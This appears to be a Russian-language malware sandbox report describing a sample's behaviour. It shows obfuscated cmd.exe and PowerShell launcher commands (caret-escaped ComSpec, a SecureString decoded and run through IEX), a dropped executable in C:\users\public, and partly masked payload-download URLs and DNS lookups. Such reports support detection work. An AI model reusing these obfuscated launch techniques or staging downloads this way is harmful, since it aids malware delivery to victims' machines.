Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' oBzENFtztkmhYb CflJYvEMiXnvawVCbVjVvAz UPUGRIsTNRi & %C^om^S^pEc% %C^om^S^pEc% /V /c set %tzITSfhEizEvkiF%=jOYImXqVmUnoV&&set %var1%=p&&set %var2%=ow&&set...
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\260790.exe
Удаляет следующие файлы
- C:\users\public\260790.exe
Подменяет следующие файлы
- C:\users\public\260790.exe
Сетевая активность
Подключается к
- 'le####services.fr':80
- 'le####services.fr':443
- 'ze###tagur.com':80
- 'ze###tagur.com':443
- 'ar###ziv.com':80
TCP
Запросы HTTP GET
- http://le####services.fr/wiB9s/
- http://ze###tagur.com/gCWu/
- http://ar###ziv.com/Site7_Pixelhobbies/iV1PKqL/
- http://www.ar###ziv.com/Site7_Pixelhobbies/iV1PKqL/
Другие
- 'le####services.fr':443
- 'ze###tagur.com':443
UDP
- DNS ASK le####services.fr
- DNS ASK ni####nskysport.ru
- DNS ASK be###y-tea.com
- DNS ASK ze###tagur.com
- DNS ASK ar###ziv.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' oBzENFtztkmhYb CflJYvEMiXnvawVCbVjVvAz UPUGRIsTNRi & %C^om^S^pEc% %C^om^S^pEc% /V /c set %tzITSfhEizEvkiF%=jOYImXqVmUnoV&&set %var1%=p&&set %var2%=ow&&set...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ". ( $PsHome[4]+$PSHoME[34]+'X') ( ( [RunTime.InTEROpserVICes.MArShal]::([RuntImE.IntEROpsERViCES.MarshAl].GeTMeMBerS()[5].name).INVokE( [rUNtiME.iNtEropSErVICES.marShAL]::sEcUreSTRINgtOBStr( $...
